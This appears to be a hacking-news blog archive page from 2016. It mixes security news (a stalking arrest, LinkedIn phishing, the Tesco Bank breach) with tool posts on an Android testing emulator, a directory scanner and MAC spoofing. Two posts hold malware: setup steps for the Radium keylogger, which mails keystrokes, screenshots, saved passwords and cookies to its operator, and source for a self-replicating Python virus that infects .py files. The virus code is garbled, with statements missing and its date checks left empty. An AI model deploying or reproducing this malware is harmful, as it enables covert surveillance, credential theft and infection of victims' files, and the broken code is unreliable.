Search Here

Tuesday, 20 December 2016

Nathan: Android Emulator for Mobile Security Testing Tool

Nathan: Android Emulator for Mobile Security Testing Tool

Nathan is a 5.1.1 SDK 22 AOSP Android emulator customized to perform mobile security assessment.

Supported architectures:
arm (soon)

The emulator is equipped with the Xposed Framework and the following pre-installed modules:

SSLUnpinning, to bypass SSL Certificate pinning.Inspeckage, to perform the dynamic analysis of an application.RootCloak, to bypass root detection.

The following tools are already installed:

#SuperSU: Superuser access management toolDrozer: Comprehensive security and attack framework for Android


Only python 2.7.x requiredHooking ready with XposedPre-installed tools for application analysisFully customizableSnapshot and restore of user data


Download Nathan core scripts from git:
$ git clone
$ cd nathan

Init Nathan for the first time (for downloading firmware files)
$ ./ init 

If a proxy is required to download files, the parameter -dp is available :
$ ./ init -dp
The init command downloads all the files required to run use Nathan Emulator.


To start Nathan:
$ ./ start

To redirect the traffic through a proxy (es., the parameter -p can be used:
$ ./ start -p

To create a snapshot of current user image data with a label (current in this case):
$ ./ snapshot -sl current 
To restore the emulator to the snapshot with label current:
$ ./ restore --rl current

To get a list of available snapshots to restore:
$ ./ restore --ll  
Every time the emulator is started, a temporary copy of system image is created and each changes made to system data is lost when the emulator is powered off.

To keep permanent the changes, the command freeze is available:
$ ./ freeze  

To push files from a folder to a running Nathan emulator, the command push is available:
$ ./ push -f folder  

The complete list of command is:

usage: [-h] [-v] [-a ARCH]
{init,start,snapshot,restore,freeze,push} ...

Optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Show emulator/kernel logs
  -a ARCH, --arch ARCH  Select architecture (arm/x86) - Default = x86

Command to run:
    init                Download and init Nathan emulator
    start               Start Nathan emulator
    snapshot            Create userdata image snapshot
    restore             Restore userdata image snapshot
    freeze              Freeze temporary system image
    push                Push files to Nathan emulator 
The parameter -h for each command shows specific options.

Thursday, 10 November 2016

22 Year Old Student Arrested For Cyber Stalking

A 22 year old student named Kishan, studying second year in AJC Bose College has been arrested for being involved in cyber stalking. The hacker hacked a victims Facebook account of class 10 living in the Tiljala area.
According to joint CP (crime) Visahal Garg, the hacker first hacked the victims Facebook account in early July and changed the password. Being unaware of the hack, the girl dedicated to create a new account. As soon as the girl opened a new account, the hacker started to post obscene images on both the accounts tagging all their friends. The girl and her parents registered a case in Police station on July 18.
Vishal Garg also mentioned that, the hacker had even demanded for $120 ( Rs 10,000) from the minor to stop sending obscene images.
“We have added charges of extortion besides the IT Act against the accused,” he said.
“We took help of Facebook authorities through proper channels and based on their feedback, we arrested the accused. We have recovered two mobile phones used by the accused to carry out the hacking,” he added.

Create Your Own Ubuntu 16.04 or 16.10 Live ISO with MeX and Refracta

GNU/Linux developer Arne Exton is always ahead of time, and it looks like he has just released a new build of his MeX GNU/Linux distribution that ships with the Refracta tools pre-installed.
MeX Build 161030 arrived a couple of days ago, based on the Debian GNU/Linux 8.6 “Jessie” and Ubuntu 16.04.1 LTS (Xenial Xerus) operating systems. It includes a special 4.8.0-25-exton kernel injected with support for additional hardware components, and uses the latest Cinnamon 3.0.7 desktop environment that comes with Linux Mint 18.
However, the new feature of the MeX Build 161030 release is the integration of the Refracta tools, which let users create their own installable and bootable Ubuntu Live ISO images, which can be based on either the Ubuntu 16.04.1 LTS (Xenial Xerus) or Ubuntu 16.10 (Yakkety Yak) operating systems.
“You can use the Refracta tools (pre-installed in MeX Build 161030) to create your own installable Ubuntu Live DVD once you have installed MeX to hard drive,” said Arne Exton in the release announcement. “I mean change everything and then create a whole new Ubuntu 16.04 or 16.10 live system.”
When attempting to create your own Ubuntu-based Live ISO, you should know that you don’t even have to install the MeX operating system on your personal computer, as the Refracta tools work straight from the Live DVD, according to Arne Exton, but you’ll need to have plenty of system memory (RAM) for things to work as expected.
The entire Ubuntu ISO creation process won’t take more than 5 to 10 minutes using the Refracta tools. As one might have expected, all the packages included in MeX Build 161030 have been updated as of October 30, 2016, and you can study the full list of pre-installed packages. In the meantime, download MeX Build 161030 right now via our website.

Images of Upcoming Nokia D1C Leaked and They Look Gorgeous

Day after day we are getting more news about the Nokia’s upcoming smartphones. The information we get from most of the sources is not reliable as one contradicts the other.
A few days back we got news stating about HMD Global company building the Nokia phones in the coming years. They have already appointed a UK-based independent PR agency Mother to take care of the marketing campaign.
We can be sure that the Mother’s first project won’t come out until next year, which suggests that HMD Global might not introduce any Nokia handsets the current year.
Previous rumors claimed the first Nokia phones in a long time will be unveiled later this year, while two other high-end phones might be revealed in Q2 2017.
One of these unannounced smartphones appeared in many leaks as Nokia D1C. Some pictures of the alleged phone emerged several weeks ago, so pretty much every Nokia fans was willing to jump in the hype train.
Unfortunately, we might have to wait a while longer for the first Nokia phones to arrive, as HMD Global is more concerned about marketing and distribution of these devices.

Three Different Colors, Specs and Designs

Still, it doesn’t hurt to learn a bit more about Nokia’s upcoming smartphones, even if they haven’t been confirmed yet. A set of images showing the alleged Nokia D1C have just leaked directly from China.
These renders are based on the images of real Nokia prototypes, the source claims. Even if HMD Global could still make some changes the final design of the phone, at least we have an idea of what’s to come.
Three version of the Nokia D1C are rumored to arrive on the market: Gold, Black and White. However, only the Gold version will come with fingerprint sensor, whereas the Black and White colors will lack this feature.
Also, the Black and White versions of the D1C will have a metal frame and polycarbonate back cover, while the Gold model should feature an all-metal unibody design. We believe these rumors are a bit far-fetched, so take them with a tint of salt.

OpenDoor – OWASP Directory Access Scanner

OpenDoor is an open-source software that scans the site directories and find all possible ways to login, empty directories and entry points. Scans conducted in the dictionary that is included in this application.

System Requirements:

  • Python 2.7.x

Installation command:

sudo pip install -r requirements.txt


  • multithreading
  • filesystem log
  • detect redirects
  • random user agent
  • random proxy from proxy list
  • verbose mode
  • subdomains scanner

How to use:

python ./ --url ""

Note: This tool is only for informational purposes and organizations is prohibited.

Cyber Criminals Attacking LinkedIn User’s With Phishing Scam

Cyber criminals are now targeting LinkedIn users with a phishing scam where they are tricking the user into believing that their LinkedIn account has a security issue which can be solved only by providing their personal details. The email that is targeting users comes from postmaster [@] fnotify [dot] com which is not linked with LinkedIn. However it is found that the email domain associated with the email is actually a WordPress blog registered to a guy, Torgeir Salvesen from Finland.
The password reset link which has been censored by the researchers is actually LinkedIn’s password reset link that asks users to change their password to avoid it from being misused. Also there have been a lot of errors from the cyber criminals and looks like they forgot to link the real phishing link on password reset link.
Apparently the email content also contains another link which redirects to a Dropbox link . The Dropbox link asks users to upload their viewable scanned copy of the payment method, account holder’s government-issued photo identification (that is a driver’s license or passport) and a payment receipt.
This was identified by researchers at Heimdal Security who pointed out that the main reason behind this scam is to steal user’s financial details, driving license and or passport copy. The purpose of collecting this information is to not only hijacking their account but also conduct further scams by stealing their identity.

Radium Keylogger – A Keylogger Using Python

Python keylogger with multiple features.


Install and Use:

Step 1: Download the libraries if you are missing any.
Step 2: Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.
Step 3: Set the FTP server. Make the folder Radium in which you’ll store the new version of exe.
Step 4: Set the FTP ip, username, password.
Note: Remember to encode the password in base64.
Step 5: Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.
Step 6: Make the exe using Pyinstaller
Step 7: Keylogs will be mailed after every 300 key strokes. This can be changed.
Step 8: Screenshot is taken after every 500 key strokes. This can be changed.
Step 9: Remember: If you make this into exe, change the variable “originalfilename” and “coppiedfilename” in function copytostartup().
Step 10: Remember: whatever name you give to “coppiedfilename“, should be given to checkfilename in deleteoldstub().


  • Applications and keystrokes logging
  • Screenshot logging
  • Drive tree structure
  • Logs sending by email
  • Password Recovery for
    • Chrome
    • Mozilla
    • Filezilla
    • Core FTP
    • CyberDuck
    • FTPNavigator
    • WinSCP
    • Outlook
    • Putty
    • Skype
    • Generic Network
  • Cookie stealer
  • Keylogger stub update mechanism
  • Gather system information
    • Internal and External IP
    • Ipconfig /all output
    • Platform

Things to work on:

  • Persistance
  • Taking screenshots after a specific time. Making it keystrokes independent.
  • Webcam logging
  • Skype chat history stealer
  • Steam credential harvestor

    Video tutorial on Radium keylogger:

A New Vulnerability In Chrome For Android Allows Hackers To Download Trojan In Your Device

A new vulnerability in Chrome for Android is found which allows hackers to quietly download banking trojan apps (.apk) onto user’s device without their knowledge. A pop-up ad that appears out of nowhere and surprise you that your mobile device has been infected with a dangerous virus and instructs you to install a security app to remove it immediately.
However this malicious advertising web page automatically downloads an APK file to your device without requiring any approval. When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user, according to a security expert.

Since this August the Trojan has infected over 318,000 Android devices across the world. Google has acknowledged the issue, blocked the malicious ads and planned to patch it in the next update of Chrome.

iPhone Has A Secret One-Handed Keyboard Which You Didn’t Know About It All This Time

Developer Steve Troughton-Smith recently discovered hidden code for a one-handed keyboard in Apple’s iOS by hacking an iOS Simulator. The shocking fact is that this one-handed keyboard has been there since the launch of iOS 8 over two years ago.
However there is something similar on your iPhone already, with the landscape keyboard offering several shortcuts. But this version happens to push either side of the QWERTY portrait keyboard across in order to reach the shortcut options.
You won’t be able to make use of it unless you go through the same unofficial route as Steve.  So if you really wanna make your keyboard experience easier then take your jailbroken device and get swiping.

Britain’s Tesco Bank Hacked and 20,000 Customers Lost Their money

Britain’s Tesco Bank temporarily froze all online transactions Monday after around 20,000 customers had money stolen from their accounts in a hack attack.
The bank, a subsidiary of British supermarket giant Tesco, the kingdom’s biggest retailer, said it was trying to refund accounts as quickly as possible.
“Tesco Bank can confirm that, over the weekend, some of its customer current accounts have been subject to online criminal activity, in some cases resulting in money being withdrawn fraudulently,” chief executive Benny Higgins said in a statement.
The bank confirmed that of its 136,000 current account holders, 40,000 had seen suspicious transactions over the weekend, while money had been fraudulently withdrawn from around 20,000 accounts.

No figure was given for the total amount of money involved.
Tesco shares dipped by 1.28 percent to 199.90 pence in early London trading, as London stocks rose by 1.3 percent.
“We can reassure customers that any financial loss as a result of this activity will be resolved fully by Tesco Bank,” said Higgins.
The retail bank is working with the National Crime Agency and the Financial Conduct Authority to address the security breach.
“It will be investigated and hopefully that will lead to action and arrests,” an NCA spokesman said.
The spokesman said cyber-attacks tended to vary in terms of sophistication so there was no set formula for dealing with them.

Higgins told BBC radio: “We invest very heavily in insuring we have preventative measures in respect of this kind of fraudulent activity but in the modern world it’s impossible to be totally impregnable.”
Tesco Bank opened in 1997 and has 7.8 million customer accounts.

Wednesday, 9 November 2016

Unable to locate package in Ubuntu while trying to install packages by apt

First, check if the package actually exists:
  1. Go to with a web browser.
  2. Scroll down to "Search package directories"
  3. Enter the package which you're trying to install into the "Keyword" field.
    Enable "Only show exact matches:"
    Change the "Distribution" to which version of Ubuntu you're using.
    enter image description here
If there are no results, the package you are looking for doesn't exist and the next steps will not work. It may require a third party PPA or an alternative installation method.
If results are found, the package exists and you may continue with these steps:
  1. Open Software Sources (or Software & Updates in 13.04+) by searching for it in the Dash.
  2. Open the "Ubuntu Software" tab.
  3. Ensure that the first 4 check boxes on this tab are enabled:
    enter image description here
  4. Update the package lists, then test with these commands:
    sudo apt-get update
    sudo apt-get install <TEST_PACKAGE>

Also Check : How To Check DNS Records Using Basic Nslookup Command Examples

Thursday, 3 November 2016

How to make a simple computer virus in Python

A computer virus is a type of malicious software program (“malware”) that, when executed, replicates by reproducing itself (copying its own source code) or infecting other computer programs by modifying them.Infecting computer programs can include as well, data files, or the “boot” sector of the hard drive. When this replication succeeds, the affected areas are then said to be “infected” with a computer virus.The term “virus” is also commonly, but erroneously, used to refer to other types of malware. “Malware” encompasses computer viruses along with many other forms of malicious software, such as computer “worms”, ransomware, trojan horses, keyloggers, rootkits, spyware, adware, malicious Browser Helper Object (BHOs) and other malicious software. The majority of active malware threats are actually trojan horse programs or computer worms rather than computer viruses. The term computer virus, coined by Fred Cohen in 1985, is a misnomer. Viruses often perform some type of harmful activity on infected host computers, such as acquisition of hard disk space or central processing unit (CPU) time, accessing private information (e.g., credit card numbers), corrupting data, displaying political or humorous messages on the user’s screen, spamming their e-mail contacts, logging their keystrokes, or even rendering the computer useless. However, not all viruses carry a destructive “payload” or attempt to hide themselves—the defining characteristic of viruses is that they are self-replicating computer programs which install themselves without user consent.

Virus writers use social engineering deceptions and exploit detailed knowledge of security vulnerabilities to gain access to their hosts’ computers and computing resources. The vast majority of viruses target systems running Microsoft Windows, employing a variety of mechanisms to infect new hosts, and often using complex anti-detection/stealth strategies to evade antivirus software. Motives for creating viruses can include seeking profit (e.g., with ransomware), desire to send a political message, personal amusement, to demonstrate that a vulnerability exists in software, for sabotage and denial of service, or simply because they wish to explore cybersecurityissues, artificial life and evolutionary algorithms.

Here in this article we are going to code simple python virus

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.

import os
import datetime
def search(path):
    filestoinfect = []
    filelist = os.listdir(path)
    for fname in filelist:
        if os.path.isdir(path+"/"+fname):
        elif fname[-3:] == ".py":
            infected = False
            for line in open(path+"/"+fname):
                if SIGNATURE in line:
                    infected = True
            if infected == False:
    return filestoinfect
def infect(filestoinfect):
    virus = open(os.path.abspath(__file__))
    virusstring = ""
    for i,line in enumerate(virus):
        if i&gt;=0 and i &lt;39:
            virusstring += line
    for fname in filestoinfect:
        f = open(fname)
        temp =
        f = open(fname,"w")
        f.write(virusstring + temp)
def bomb():
    if == 1 and == 25:
filestoinfect = search(os.path.abspath(""))

The code performs a search for the python files and make all the strings to the Following String “HAHA YOU ARE AFFECTED BY VIRUS!! AND THAT”S AN EVIL LAUGH BY THE WAY!!”.

How To Spoof MAC Address Using Macchanger in Kali Linux

MAC address spoofing is a technique for temporarily changing your Media Access Control (MAC) address on a network device. A MAC Address is a unique and hardcoded address programmed into network devices which cannot be changed permanently. The MAC address is in the 2nd OSI layer and should be seen as the physical address of your interface. Macchanger is a tool that is included with any version of Kali Linux including the 2016 rolling edition and can change the MAC address to any desired address until the next reboot. In this tutorial we will be spoofing the MAC address of our wireless adapter with a random MAC address generated by Macchanger on Kali Linux.

MAC Address Spoofing

First we need to take down the network adapter in order to change the MAC address. This can be done using the following command:

ifconfig wlan1 down

Replace wlan1 with your own network interface.

Now use the following command to change your MAC address to a new random MAC Address:

macchanger -r wlan1

As shown on the screenshot, Macchanger will show you the permanent, current and changed MAC address. The permanent MAC Address will be restored to your network adapter after a reboot or you can reset your network adapters MAC address manually. Use the following command to restore the permanent MAC address to your network adapter manually:

macchanger –permanent wlan1

You can also spoof a particular MAC address using the following command:

macchanger -m [Spoofing MAC Address] wlan1

macchanger -m XX:XX:XX:XX:XX:XX wlan1

If you receive the following error you need to take down the network interface first before changing the MAC Address (Command: ifconfig wlan1 down):

ERROR: Can’t change MAC: interface up or not permission: Cannot assign requested address

Use the following command to bring up your network adapter with the new MAC address:

ifconfig wlan1 up

Use the following command to show the current MAC address:

macchanger –show wlan1

Anonymous Warns The World: “World War 3 Is Coming Soon

If we talk about the possibility of the WWIII, different people have different opinions. While some people call it a far-fetched possibility, others cite some recent events and say that WWIII is closer than ever.

Along the similar lines, the hacktivist collective Anonymous has released a new video warning the people about the World War 3.

What’s the basis of such prediction? Well, in recent times, Britain and the United States promised troops are preparing to move to Poland in NATO’s biggest military build-up on Russian borders since the Cold War.

Also, according to another report, across Russia, 40 million military personnel and civilians have just finished up emergency drills. This exercise has been done to prepare the people to protect themselves against any eminent possibility of nuclear or biological war.

The video talks about China, whose defense minster recently told his country’s citizen to be prepared for the “people’s war at sea”. It also states China’s latest positioning and testing of nuclear weapons.

“Even the United States has confirmed that China has tested an Intercontinental Ballistic Missile, which is capable of striking everywhere in the world within half an hour,” the video says.

Here’s the complete video:

Thursday, 29 September 2016

Explained: How Criminals Hack Your Chip And Pin Card


 EMV credit cards have till now been assumed to be unhackable. The security professor from the University of California explains how it is NOT so.
With the advancing technology and due time given anything and everything can be hacked. We have already seen some of such events like the car-hacking, whole corporates brought down by the attackers, and recent revelations by ex-NSA contractor that your smartphone can be hacked with just one SMS makes security a serious issue in the contemporary world.
Now, the latest buzz is that even the new EMV (Europay, MasterCard, and Visa) credit card verification chip system that was supposedly promised by these companies to be unhackable has been exposed. The EMV cards have inbuilt microprocessor chips that give it a double layered security. It works analogous to the two-factor authentication, generating a unique code each time you use your credit card rendering it almost impossible for the hacker to steal your information. Well, almost…
Professor Ross Anderson from the Computer Laboratory at the University of Cambridge explains in this video how the black-hats compromise the Chip &
Pin system to gain access to the sensitive information.
Watch the video below:
Did you find this article helpful? Let us know in comments below.